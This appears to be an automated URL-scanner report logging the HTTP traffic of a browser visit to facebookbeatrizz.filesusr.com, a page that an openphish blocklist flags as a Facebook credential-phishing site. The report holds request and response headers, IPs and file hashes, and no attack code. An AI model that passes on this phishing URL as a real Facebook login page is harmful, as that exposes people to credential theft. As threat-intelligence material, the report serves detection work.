data - sigil = "m_login_email" / >

HTTP Transactions (34)

Request	Response
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: a382476d14b6ae14003333e7acdfbbd9ae8775d4c1a7d5c31116f33987043cff 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "A382476D14B6AE14003333E7ACDFBBD9AE8775D4C1A7D5C31116F33987043CFF" Last-Modified: Thu, 29 Sep 2022 00:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=14205 Expires: Thu, 29 Sep 2022 12:32:48 GMT Date: Thu, 29 Sep 2022 08:36:03 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 6dd4587c98aef98ad0939030a6976a7f Sha1: 92dc5966ac2deb0c3ac7fdd02bf8d28f9239801e Sha256: a382476d14b6ae14003333e7acdfbbd9ae8775d4c1a7d5c31116f33987043cff
GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: firefox.settings.services.mozilla.com/v1/ FQDN: firefox.settings.services.mozilla.com IP: 143.204.55.35 HASH: a2427848ba35575dda8a82cf88f104978234c05389deebc3fc8279d9075eff45 143.204.55.35 HTTP/1.1 200 OK Content-Type: application/json Content-Length: 939 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Backoff, Content-Length, Retry-After Cache-Control: max-age=3600 Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Date: Thu, 29 Sep 2022 08:05:09 GMT X-Content-Type-Options: nosniff X-Cache: Hit from cloudfront Via: 1.1 83a23d85c009b0c0e3626072e9f997fe.cloudfront.net (CloudFront) X-Amz-Cf-Pop: OSL50-C1 X-Amz-Cf-Id: ASXdFesFb-0_6BnI2dtMczR-CoHXRxMgqFtKgXZXL8Hl8pSVxI3NaA== Age: 1854 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (939), with no line terminators Size: 939 Md5: 1b3053fa528e28810f8a2cc9284cc921 Sha1: cca9eb471d941881a6b9a1793aecb6c281908f6a Sha256: a2427848ba35575dda8a82cf88f104978234c05389deebc3fc8279d9075eff45
GET /html/361366_ddd3079eb13b048ee9de3517a759b9aa.html?546067yw5pbmhhymfuyw5pbmhhodnaag90bwfpbc5jb20= HTTP/1.1 Host: facebookbeatrizz.filesusr.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1	URL: facebookbeatrizz.filesusr.com/html/361366_ddd3079eb13b0 (...) FQDN: facebookbeatrizz.filesusr.com IP: 34.102.176.152 HASH: 17ea2caa5ff53391faf7744fe077e35497f8bc4a7166bdc8d4d0953f35bacf97 34.102.176.152 HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: openresty/1.21.4.1 Date: Thu, 29 Sep 2022 08:36:03 GMT Content-Length: 116344 X-GUploader-UploadID: ADPycds2tdGjPm3Z_uCIsQZuDwhU84Jan_MFKX75CH0m_IzECe3KQDRCtiIBkPrvic9hPYvEmuymN2jCEK5vGl_1VwGTHQ x-goog-generation: 1664262433135850 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 116344 x-goog-hash: crc32c=zBSb9Q==, md5=3dMHnrE7BI7p3jUXp1m5qg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Expires: Thu, 29 Sep 2022 09:30:50 GMT Cache-Control: public, max-age=15552000, immutable Age: 313 Last-Modified: Tue, 27 Sep 2022 07:07:13 GMT ETag: "ddd3079eb13b048ee9de3517a759b9aa" Access-Control-Allow-Origin: * Timing-Allow-Origin: * X-Seen-By: gcp.us-central-1.media-router-765d45dbd8-cqjsp Via: 1.1 google --- Additional Info --- Magic: HTML document, ASCII text, with very long lines (64635) Size: 116344 Md5: ddd3079eb13b048ee9de3517a759b9aa Sha1: 4dbabcd6814ea3b1f5ac71b80c6f9c3a4b3cf660 Sha256: 17ea2caa5ff53391faf7744fe077e35497f8bc4a7166bdc8d4d0953f35bacf97 Alerts: Blocklists: - openphish: Facebook, Inc.
GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: content-signature-2.cdn.mozilla.net/chains/remote-setti (...) FQDN: content-signature-2.cdn.mozilla.net IP: 143.204.55.110 HASH: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770 143.204.55.110 HTTP/2 200 OK content-type: binary/octet-stream content-length: 5348 last-modified: Sat, 10 Sep 2022 18:47:45 GMT content-disposition: attachment accept-ranges: bytes server: AmazonS3 date: Thu, 29 Sep 2022 05:28:28 GMT etag: "6113f8408c59aebe188d6af273b90743" x-cache: Hit from cloudfront via: 1.1 c9f2a4d2bcd548d1a3cbe1617a22f216.cloudfront.net (CloudFront) x-amz-cf-pop: OSL50-C1 x-amz-cf-id: T4lB7dcxKdGFcCREvCuJXKU4DZPGojEwr3FROxZURYg4AKser5N60g== age: 11256 X-Firefox-Spdy: h2 --- Additional Info --- Magic: PEM certificate\012- , ASCII text Size: 5348 Md5: 6113f8408c59aebe188d6af273b90743 Sha1: 7398873bf00f99944eaa77ad3ebc0d43c23dba6b Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
GET /v1/tiles HTTP/1.1 Host: contile.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: contile.services.mozilla.com/v1/tiles FQDN: contile.services.mozilla.com IP: 34.117.237.239 HASH: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3 34.117.237.239 HTTP/2 200 OK content-type: application/json server: nginx date: Thu, 29 Sep 2022 08:36:03 GMT content-length: 12 strict-transport-security: max-age=31536000 via: 1.1 google alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with no line terminators Size: 12 Md5: 23e88fb7b99543fb33315b29b1fad9d6 Sha1: a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5380 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:06:23 GMT Server: ECS (ska/F708) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5343 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:07:00 GMT Server: ECS (ska/F718) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2536 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:53:47 GMT Server: ECS (ska/F70E) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5380 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:06:23 GMT Server: ECS (ska/F708) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5343 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:07:00 GMT Server: ECS (ska/F718) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
GET /rsrc.php/v3/yJ/l/0,cross/655dsu3Q_r6.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	URL: static.xx.fbcdn.net/rsrc.php/v3/yJ/l/0,cross/655dsu3Q_r (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: 2333af858ca62f59955d40969949dde6e11b0740c5af5cabcf1b2aade248f073 31.13.72.12 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Tue, 19 Sep 2023 08:43:34 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: tjTW07s/ntpIdnMM51yHzA== x-fb-debug: f2yBu/XkFJ7CGkfQlFPtaK8Zf8IpC5rXFsYgEkYpaAcm2r2Go7Jx1pEEFtgGMefs/5i0E4SRNv5WDpbzQceWdA== content-length: 3698 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:03 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (6914) Size: 3698 Md5: b634d6d3bb3f9eda4876730ce75c87cc Sha1: 06a8adb7f8c1f4b0b90e20ad24898b61c565d817 Sha256: 2333af858ca62f59955d40969949dde6e11b0740c5af5cabcf1b2aade248f073
GET /rsrc.php/v3/ye/l/0,cross/aQyKILs0gyc.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	URL: static.xx.fbcdn.net/rsrc.php/v3/ye/l/0,cross/aQyKILs0gy (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: 95ae00d129fa333f17396918bfe08176e16a0db9851210775a4baba6627abc87 31.13.72.12 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Sun, 17 Sep 2023 04:43:50 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: m03uu7wsbUsd7uyOx/Ffhw== x-fb-debug: 8bszUVsjGmOA8n8xkYF1uMeDdKPvK3npSQs73Repc4cfoNe7WAwW/u+LuqGdLA1B13wjNcBb3wqKDQNqunvFhA== content-length: 9685 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:03 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (6645) Size: 9685 Md5: 9b4deebbbc2c6d4b1deeec8ec7f15f87 Sha1: ebcd39e5cddb7d7c0380c5632b000d2d1cd6d09b Sha256: 95ae00d129fa333f17396918bfe08176e16a0db9851210775a4baba6627abc87
GET /rsrc.php/v3/yH/l/0,cross/IKa1x_hP-dA.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/IKa1x_hP-d (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: d3cd2c06a85f5eedd4a707b2ab27d0e3fff6cc5de4e6e5fc2cf8730afcc65b4a 31.13.72.12 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Sun, 17 Sep 2023 04:43:50 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: DEakO6TynjPlDtRgc3Gq2g== x-fb-debug: XTVpBrWQ1QTmbfTwB5pcZEUUeid4pQAIT8uvg8mnoV4fGGwhRjueQaHF80yx1Me+sP6RoN8ej+0S5WDufNwD2A== priority: u=3,i content-length: 9715 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:03 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (7518) Size: 9715 Md5: 0c46a43ba4f29e33e50ed4607371aada Sha1: e0059698049cac23e124e5adb13189f1db4b3dbb Sha256: d3cd2c06a85f5eedd4a707b2ab27d0e3fff6cc5de4e6e5fc2cf8730afcc65b4a
GET /rsrc.php/v3/yF/r/sAcaU2FJdDD.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	URL: static.xx.fbcdn.net/rsrc.php/v3/yF/r/sAcaU2FJdDD.js?_nc (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: SIplx9G7rYmkQDzZXRJtXjfX8NbUnY1LLd5kk5yyWiHtV8bE2jnaoa6sIFbuaApA1kLKBD49PM2+pecwUH/5Dw== content-length: 0 priority: u=3,i x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:03 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2536 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:03 GMT Last-Modified: Thu, 29 Sep 2022 07:53:47 GMT Server: ECS (ska/F70E) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 366fbb58b56c6469840359066ae0ef4b Sha1: 519ec2d019a3df15e1555ee7e9f784207f3ee604 Sha256: 4c03f3b3b06d0359ff6c3e72e91c39cb8f6e6406ed7b8ba9e09708da8e2d38f4
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: firefox.settings.services.mozilla.com/v1/buckets/main/c (...) FQDN: firefox.settings.services.mozilla.com IP: 143.204.55.35 HASH: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300 143.204.55.35 HTTP/1.1 200 OK Content-Type: application/json Content-Length: 329 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff Date: Thu, 29 Sep 2022 08:29:33 GMT Cache-Control: max-age=3600, max-age=3600 Expires: Thu, 29 Sep 2022 08:40:37 GMT ETag: "1648230346554" X-Cache: Hit from cloudfront Via: 1.1 8e6dce34fd223e0c9d89fd938d1784a2.cloudfront.net (CloudFront) X-Amz-Cf-Pop: OSL50-C1 X-Amz-Cf-Id: ootVtRV_iXV4OD4k9RJ8bb8S_4lTtjWnWXTrJobiyt6s7jJyju75Dw== Age: 391 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (329), with no line terminators Size: 329 Md5: 0333b0655111aa68de771adfcc4db243 Sha1: 63f295a144ac87a7c8e23417626724eeca68a7eb Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /rsrc.php/v3ivXO4/yZ/l/es_LA/wgQtNFI9dU-.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3ivXO4/yZ/l/es_LA/wgQtNFI (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: ysLXxReBUANTRrc2581QAcqhzRHj/USXWYow8ycLnNSztNOy3BVnh0/G5nx9CSRcGG68gljo0+B2MPOpGFqvQA== content-length: 0 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/y1/l/0,cross/v-qA4RoF1Br.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3/y1/l/0,cross/v-qA4RoF1B (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: 3FaAS4SFAwWeL+xHIjmDw9Rkk2djS8AoO1uE1QWB3HbfCOQR92yt9HfOThd3ntkhp18i6Q2NAOEtUg8ZrS1psQ== content-length: 0 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
